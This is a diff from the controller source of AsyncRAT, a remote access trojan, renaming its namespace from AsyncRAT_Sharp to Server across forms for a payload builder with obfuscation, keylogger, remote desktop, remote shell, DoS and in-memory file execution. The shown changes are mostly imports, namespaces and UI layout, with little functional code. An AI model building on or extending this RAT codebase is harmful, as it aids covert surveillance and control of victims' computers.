this.txtProductVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtProductVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtProductVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtProductVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtProductVersion.Enabled = false; this.txtProductVersion.Enabled = false;
this.txtProductVersion.Location = new System.Drawing.Point(159, 325); this.txtProductVersion.Location = new System.Drawing.Point(159, 325);
this.txtProductVersion.Name = "txtProductVersion"; this.txtProductVersion.Name = "txtProductVersion";
this.txtProductVersion.Size = new System.Drawing.Size(337, 26); this.txtProductVersion.Size = new System.Drawing.Size(337, 26);
this.txtProductVersion.TabIndex = 18; this.txtProductVersion.TabIndex = 18;
this.txtProductVersion.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtProductVersion; this.txtProductVersion.Text = global::Server.Properties.Settings.Default.txtProductVersion;
// //
// txtOriginalFilename // txtOriginalFilename
// //
this.txtOriginalFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtOriginalFilename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtOriginalFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtOriginalFilename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtOriginalFilename.Enabled = false; this.txtOriginalFilename.Enabled = false;
this.txtOriginalFilename.Location = new System.Drawing.Point(159, 280); this.txtOriginalFilename.Location = new System.Drawing.Point(159, 280);
this.txtOriginalFilename.Name = "txtOriginalFilename"; this.txtOriginalFilename.Name = "txtOriginalFilename";
this.txtOriginalFilename.Size = new System.Drawing.Size(337, 26); this.txtOriginalFilename.Size = new System.Drawing.Size(337, 26);
this.txtOriginalFilename.TabIndex = 17; this.txtOriginalFilename.TabIndex = 17;
this.txtOriginalFilename.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtOriginalFilename; this.txtOriginalFilename.Text = global::Server.Properties.Settings.Default.txtOriginalFilename;
// //
// txtTrademarks // txtTrademarks
// //
this.txtTrademarks.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtTrademarks", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtTrademarks.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtTrademarks", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtTrademarks.Enabled = false; this.txtTrademarks.Enabled = false;
this.txtTrademarks.Location = new System.Drawing.Point(159, 237); this.txtTrademarks.Location = new System.Drawing.Point(159, 237);
this.txtTrademarks.Name = "txtTrademarks"; this.txtTrademarks.Name = "txtTrademarks";
this.txtTrademarks.Size = new System.Drawing.Size(337, 26); this.txtTrademarks.Size = new System.Drawing.Size(337, 26);
this.txtTrademarks.TabIndex = 16; this.txtTrademarks.TabIndex = 16;
this.txtTrademarks.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtTrademarks; this.txtTrademarks.Text = global::Server.Properties.Settings.Default.txtTrademarks;
// //
// txtCopyright // txtCopyright
// //
this.txtCopyright.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtCopyright", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtCopyright.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtCopyright", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtCopyright.Enabled = false; this.txtCopyright.Enabled = false;
this.txtCopyright.Location = new System.Drawing.Point(159, 198); this.txtCopyright.Location = new System.Drawing.Point(159, 198);
this.txtCopyright.Name = "txtCopyright"; this.txtCopyright.Name = "txtCopyright";
this.txtCopyright.Size = new System.Drawing.Size(337, 26); this.txtCopyright.Size = new System.Drawing.Size(337, 26);
this.txtCopyright.TabIndex = 15; this.txtCopyright.TabIndex = 15;
this.txtCopyright.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtCopyright; this.txtCopyright.Text = global::Server.Properties.Settings.Default.txtCopyright;
// //
// txtCompany // txtCompany
// //
this.txtCompany.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtCompany", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtCompany.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtCompany", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtCompany.Enabled = false; this.txtCompany.Enabled = false;
this.txtCompany.Location = new System.Drawing.Point(159, 155); this.txtCompany.Location = new System.Drawing.Point(159, 155);
this.txtCompany.Name = "txtCompany"; this.txtCompany.Name = "txtCompany";
this.txtCompany.Size = new System.Drawing.Size(337, 26); this.txtCompany.Size = new System.Drawing.Size(337, 26);
this.txtCompany.TabIndex = 14; this.txtCompany.TabIndex = 14;
this.txtCompany.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtCompany; this.txtCompany.Text = global::Server.Properties.Settings.Default.txtCompany;
// //
// label14 // label14
// //
@ -596,13 +596,13 @@ namespace AsyncRAT_Sharp.Forms
// //
// txtDescription // txtDescription
// //
this.txtDescription.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtDescription", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtDescription.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtDescription", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtDescription.Enabled = false; this.txtDescription.Enabled = false;
this.txtDescription.Location = new System.Drawing.Point(159, 112); this.txtDescription.Location = new System.Drawing.Point(159, 112);
this.txtDescription.Name = "txtDescription"; this.txtDescription.Name = "txtDescription";
this.txtDescription.Size = new System.Drawing.Size(337, 26); this.txtDescription.Size = new System.Drawing.Size(337, 26);
this.txtDescription.TabIndex = 7; this.txtDescription.TabIndex = 7;
this.txtDescription.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtDescription; this.txtDescription.Text = global::Server.Properties.Settings.Default.txtDescription;
// //
// label7 // label7
// //
@ -615,13 +615,13 @@ namespace AsyncRAT_Sharp.Forms
// //
// txtProduct // txtProduct
// //
this.txtProduct.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "ProductName", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtProduct.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "ProductName", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtProduct.Enabled = false; this.txtProduct.Enabled = false;
this.txtProduct.Location = new System.Drawing.Point(159, 69); this.txtProduct.Location = new System.Drawing.Point(159, 69);
this.txtProduct.Name = "txtProduct"; this.txtProduct.Name = "txtProduct";
this.txtProduct.Size = new System.Drawing.Size(337, 26); this.txtProduct.Size = new System.Drawing.Size(337, 26);
this.txtProduct.TabIndex = 5; this.txtProduct.TabIndex = 5;
this.txtProduct.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.ProductName; this.txtProduct.Text = global::Server.Properties.Settings.Default.ProductName;
// //
// label8 // label8
// //

View File

@ -1,9 +1,9 @@
using System; using System;
using System.Windows.Forms; using System.Windows.Forms;
using AsyncRAT_Sharp.Helper; using Server.Helper;
using System.Text; using System.Text;
using System.Security.Cryptography; using System.Security.Cryptography;
using AsyncRAT_Sharp.Cryptography; using Server.Cryptography;
using System.Security.Cryptography.X509Certificates; using System.Security.Cryptography.X509Certificates;
using System.Collections.Generic; using System.Collections.Generic;
using Vestris.ResourceLib; using Vestris.ResourceLib;
@ -11,9 +11,9 @@ using dnlib.DotNet;
using System.IO; using System.IO;
using System.Linq; using System.Linq;
using dnlib.DotNet.Emit; using dnlib.DotNet.Emit;
using AsyncRAT_Sharp.RenamingObfuscation; using Server.RenamingObfuscation;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormBuilder : Form public partial class FormBuilder : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormCertificate partial class FormCertificate
{ {

View File

@ -5,7 +5,7 @@ using System.Security.Cryptography.X509Certificates;
using System.IO; using System.IO;
using System.IO.Compression; using System.IO.Compression;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormCertificate : Form public partial class FormCertificate : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormChat partial class FormChat
{ {

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using Microsoft.VisualBasic; using Microsoft.VisualBasic;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
@ -12,7 +12,7 @@ using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
using System.Threading; using System.Threading;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormChat : Form public partial class FormChat : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormDOS partial class FormDOS
{ {

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.ComponentModel; using System.ComponentModel;
@ -13,7 +13,7 @@ using System.Threading;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormDOS : Form public partial class FormDOS : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormDotNetEditor partial class FormDotNetEditor
{ {

View File

@ -10,13 +10,13 @@ using System.Text;
using System.Threading; using System.Threading;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using FastColoredTextBoxNS; using FastColoredTextBoxNS;
using Microsoft.CSharp; using Microsoft.CSharp;
using Microsoft.VisualBasic; using Microsoft.VisualBasic;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormDotNetEditor : Form public partial class FormDotNetEditor : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormDownloadFile partial class FormDownloadFile
{ {

View File

@ -1,4 +1,4 @@
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.ComponentModel; using System.ComponentModel;
@ -12,9 +12,9 @@ using System.Threading;
using System.IO; using System.IO;
using System.Net.Sockets; using System.Net.Sockets;
using Timer = System.Threading.Timer; using Timer = System.Threading.Timer;
using AsyncRAT_Sharp.Helper; using Server.Helper;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormDownloadFile : Form public partial class FormDownloadFile : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormFileManager partial class FormFileManager
{ {

View File

@ -1,11 +1,11 @@
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Windows.Forms; using System.Windows.Forms;
using System.Threading; using System.Threading;
using System.IO; using System.IO;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormFileManager : Form public partial class FormFileManager : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormKeylogger partial class FormKeylogger
{ {

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.ComponentModel; using System.ComponentModel;
@ -12,7 +12,7 @@ using System.Threading;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormKeylogger : Form public partial class FormKeylogger : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormPassword partial class FormPassword
{ {

View File

@ -8,7 +8,7 @@ using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormPassword : Form public partial class FormPassword : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormPorts partial class FormPorts
{ {

View File

@ -2,10 +2,10 @@
using System.Windows.Forms; using System.Windows.Forms;
using System.IO; using System.IO;
using System.Diagnostics; using System.Diagnostics;
using AsyncRAT_Sharp.Helper; using Server.Helper;
using System.Security.Cryptography.X509Certificates; using System.Security.Cryptography.X509Certificates;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormPorts : Form public partial class FormPorts : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormProcessManager partial class FormProcessManager
{ {

View File

@ -8,10 +8,10 @@ using System.Text;
using System.Threading; using System.Threading;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormProcessManager : Form public partial class FormProcessManager : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormRemoteDesktop partial class FormRemoteDesktop
{ {
@ -84,7 +84,7 @@
// //
// btnMouse // btnMouse
// //
this.btnMouse.BackgroundImage = global::AsyncRAT_Sharp.Properties.Resources.mouse; this.btnMouse.BackgroundImage = global::Server.Properties.Resources.mouse;
this.btnMouse.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch; this.btnMouse.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
this.btnMouse.Location = new System.Drawing.Point(550, 3); this.btnMouse.Location = new System.Drawing.Point(550, 3);
this.btnMouse.Name = "btnMouse"; this.btnMouse.Name = "btnMouse";
@ -95,7 +95,7 @@
// //
// btnSave // btnSave
// //
this.btnSave.BackgroundImage = global::AsyncRAT_Sharp.Properties.Resources.save_image; this.btnSave.BackgroundImage = global::Server.Properties.Resources.save_image;
this.btnSave.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch; this.btnSave.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
this.btnSave.Location = new System.Drawing.Point(455, 3); this.btnSave.Location = new System.Drawing.Point(455, 3);
this.btnSave.Name = "btnSave"; this.btnSave.Name = "btnSave";
@ -171,7 +171,7 @@
// //
// button1 // button1
// //
this.button1.BackgroundImage = global::AsyncRAT_Sharp.Properties.Resources.stop__1_; this.button1.BackgroundImage = global::Server.Properties.Resources.stop__1_;
this.button1.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch; this.button1.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
this.button1.Location = new System.Drawing.Point(12, 3); this.button1.Location = new System.Drawing.Point(12, 3);
this.button1.Name = "button1"; this.button1.Name = "button1";
@ -182,7 +182,7 @@
// //
// button2 // button2
// //
this.button2.BackgroundImage = global::AsyncRAT_Sharp.Properties.Resources.arrow_up; this.button2.BackgroundImage = global::Server.Properties.Resources.arrow_up;
this.button2.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch; this.button2.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
this.button2.FlatStyle = System.Windows.Forms.FlatStyle.Flat; this.button2.FlatStyle = System.Windows.Forms.FlatStyle.Flat;
this.button2.Location = new System.Drawing.Point(428, 44); this.button2.Location = new System.Drawing.Point(428, 44);

View File

@ -10,14 +10,14 @@ using System.Linq;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using System.Threading; using System.Threading;
using System.Drawing.Imaging; using System.Drawing.Imaging;
using System.IO; using System.IO;
using Encoder = System.Drawing.Imaging.Encoder; using Encoder = System.Drawing.Imaging.Encoder;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormRemoteDesktop : Form public partial class FormRemoteDesktop : Form
{ {

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp namespace Server
{ {
partial class FormSendFileToMemory partial class FormSendFileToMemory
{ {

View File

@ -9,9 +9,9 @@ using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
using System.IO; using System.IO;
using System.Reflection; using System.Reflection;
using AsyncRAT_Sharp.Helper; using Server.Helper;
namespace AsyncRAT_Sharp namespace Server
{ {
public partial class FormSendFileToMemory : Form public partial class FormSendFileToMemory : Form
{ {

View File

@ -1,107 +1,107 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormShell partial class FormShell
{ {
/// <summary> /// <summary>
/// Required designer variable. /// Required designer variable.
/// </summary> /// </summary>
private System.ComponentModel.IContainer components = null; private System.ComponentModel.IContainer components = null;
/// <summary> /// <summary>
/// Clean up any resources being used. /// Clean up any resources being used.
/// </summary> /// </summary>
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param> /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing) protected override void Dispose(bool disposing)
{ {
if (disposing && (components != null)) if (disposing && (components != null))
{ {
components.Dispose(); components.Dispose();
} }
base.Dispose(disposing); base.Dispose(disposing);
} }
#region Windows Form Designer generated code #region Windows Form Designer generated code
/// <summary> /// <summary>
/// Required method for Designer support - do not modify /// Required method for Designer support - do not modify
/// the contents of this method with the code editor. /// the contents of this method with the code editor.
/// </summary> /// </summary>
private void InitializeComponent() private void InitializeComponent()
{ {
this.components = new System.ComponentModel.Container(); this.components = new System.ComponentModel.Container();
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormShell)); System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormShell));
this.richTextBox1 = new System.Windows.Forms.RichTextBox(); this.richTextBox1 = new System.Windows.Forms.RichTextBox();
this.textBox1 = new System.Windows.Forms.TextBox(); this.textBox1 = new System.Windows.Forms.TextBox();
this.timer1 = new System.Windows.Forms.Timer(this.components); this.timer1 = new System.Windows.Forms.Timer(this.components);
this.panel1 = new System.Windows.Forms.Panel(); this.panel1 = new System.Windows.Forms.Panel();
this.SuspendLayout(); this.SuspendLayout();
// //
// richTextBox1 // richTextBox1
// //
this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
| System.Windows.Forms.AnchorStyles.Left) | System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right))); | System.Windows.Forms.AnchorStyles.Right)));
this.richTextBox1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54))))); this.richTextBox1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54)))));
this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None; this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.richTextBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); this.richTextBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.richTextBox1.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(248)))), ((int)(((byte)(248)))), ((int)(((byte)(242))))); this.richTextBox1.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(248)))), ((int)(((byte)(248)))), ((int)(((byte)(242)))));
this.richTextBox1.Location = new System.Drawing.Point(0, 0); this.richTextBox1.Location = new System.Drawing.Point(0, 0);
this.richTextBox1.Name = "richTextBox1"; this.richTextBox1.Name = "richTextBox1";
this.richTextBox1.ReadOnly = true; this.richTextBox1.ReadOnly = true;
this.richTextBox1.Size = new System.Drawing.Size(800, 412); this.richTextBox1.Size = new System.Drawing.Size(800, 412);
this.richTextBox1.TabIndex = 0; this.richTextBox1.TabIndex = 0;
this.richTextBox1.Text = ""; this.richTextBox1.Text = "";
// //
// textBox1 // textBox1
// //
this.textBox1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(248)))), ((int)(((byte)(248)))), ((int)(((byte)(242))))); this.textBox1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(248)))), ((int)(((byte)(248)))), ((int)(((byte)(242)))));
this.textBox1.Dock = System.Windows.Forms.DockStyle.Bottom; this.textBox1.Dock = System.Windows.Forms.DockStyle.Bottom;
this.textBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); this.textBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.textBox1.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54))))); this.textBox1.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54)))));
this.textBox1.Location = new System.Drawing.Point(46, 423); this.textBox1.Location = new System.Drawing.Point(46, 423);
this.textBox1.Name = "textBox1"; this.textBox1.Name = "textBox1";
this.textBox1.Size = new System.Drawing.Size(754, 26); this.textBox1.Size = new System.Drawing.Size(754, 26);
this.textBox1.TabIndex = 1; this.textBox1.TabIndex = 1;
this.textBox1.KeyDown += new System.Windows.Forms.KeyEventHandler(this.TextBox1_KeyDown); this.textBox1.KeyDown += new System.Windows.Forms.KeyEventHandler(this.TextBox1_KeyDown);
// //
// timer1 // timer1
// //
this.timer1.Enabled = true; this.timer1.Enabled = true;
this.timer1.Interval = 1000; this.timer1.Interval = 1000;
this.timer1.Tick += new System.EventHandler(this.Timer1_Tick); this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
// //
// panel1 // panel1
// //
this.panel1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54))))); this.panel1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54)))));
this.panel1.Dock = System.Windows.Forms.DockStyle.Left; this.panel1.Dock = System.Windows.Forms.DockStyle.Left;
this.panel1.Location = new System.Drawing.Point(0, 0); this.panel1.Location = new System.Drawing.Point(0, 0);
this.panel1.Margin = new System.Windows.Forms.Padding(4, 5, 4, 5); this.panel1.Margin = new System.Windows.Forms.Padding(4, 5, 4, 5);
this.panel1.Name = "panel1"; this.panel1.Name = "panel1";
this.panel1.Size = new System.Drawing.Size(46, 449); this.panel1.Size = new System.Drawing.Size(46, 449);
this.panel1.TabIndex = 2; this.panel1.TabIndex = 2;
// //
// FormShell // FormShell
// //
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54))))); this.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54)))));
this.ClientSize = new System.Drawing.Size(800, 449); this.ClientSize = new System.Drawing.Size(800, 449);
this.Controls.Add(this.richTextBox1); this.Controls.Add(this.richTextBox1);
this.Controls.Add(this.textBox1); this.Controls.Add(this.textBox1);
this.Controls.Add(this.panel1); this.Controls.Add(this.panel1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon"))); this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Name = "FormShell"; this.Name = "FormShell";
this.Text = "Remote Shell"; this.Text = "Remote Shell";
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormShell_FormClosed); this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormShell_FormClosed);
this.ResumeLayout(false); this.ResumeLayout(false);
this.PerformLayout(); this.PerformLayout();
} }
#endregion #endregion
private System.Windows.Forms.TextBox textBox1; private System.Windows.Forms.TextBox textBox1;
public System.Windows.Forms.RichTextBox richTextBox1; public System.Windows.Forms.RichTextBox richTextBox1;
private System.Windows.Forms.Timer timer1; private System.Windows.Forms.Timer timer1;
private System.Windows.Forms.Panel panel1; private System.Windows.Forms.Panel panel1;
} }
} }

View File

@ -1,10 +1,10 @@
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.ComponentModel; using System.ComponentModel;
using System.Data; using System.Data;
using System.Diagnostics; using System.Diagnostics;
using System.Drawing; using System.Drawing;
using System.Linq; using System.Linq;
using System.Text; using System.Text;
@ -12,7 +12,7 @@ using System.Threading;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormShell : Form public partial class FormShell : Form
{ {
@ -57,11 +57,11 @@ namespace AsyncRAT_Sharp.Forms
private void Timer1_Tick(object sender, EventArgs e) private void Timer1_Tick(object sender, EventArgs e)
{ {
if (!C.ClientSocket.Connected) this.Close(); if (!C.ClientSocket.Connected) this.Close();
} }
private void Label1_Click(object sender, EventArgs e) private void Label1_Click(object sender, EventArgs e)
{ {
Process.Start("https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands"); Process.Start("https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands");
} }
} }
} }

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
partial class FormTorrent partial class FormTorrent
{ {

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.ComponentModel; using System.ComponentModel;
@ -12,7 +12,7 @@ using System.Threading;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms namespace Server.Forms
{ {
public partial class FormTorrent : Form public partial class FormTorrent : Form
{ {

View File

@ -1,6 +1,6 @@
using AsyncRAT_Sharp.Forms; using Server.Forms;
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.Linq; using System.Linq;
@ -9,7 +9,7 @@ using System.Threading;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
public class HandleChat public class HandleChat
{ {

View File

@ -1,16 +1,16 @@
using AsyncRAT_Sharp.Forms; using Server.Forms;
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Drawing; using System.Drawing;
using System.IO; using System.IO;
using System.Windows.Forms; using System.Windows.Forms;
using System.Threading; using System.Threading;
using System.Threading.Tasks; using System.Threading.Tasks;
using AsyncRAT_Sharp.Helper; using Server.Helper;
using System.Diagnostics; using System.Diagnostics;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
public class HandleFileManager public class HandleFileManager
{ {

View File

@ -1,13 +1,13 @@
using AsyncRAT_Sharp.Forms; using Server.Forms;
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Diagnostics; using System.Diagnostics;
using System.Drawing; using System.Drawing;
using System.IO; using System.IO;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
class HandleKeylogger class HandleKeylogger
{ {

View File

@ -1,12 +1,12 @@
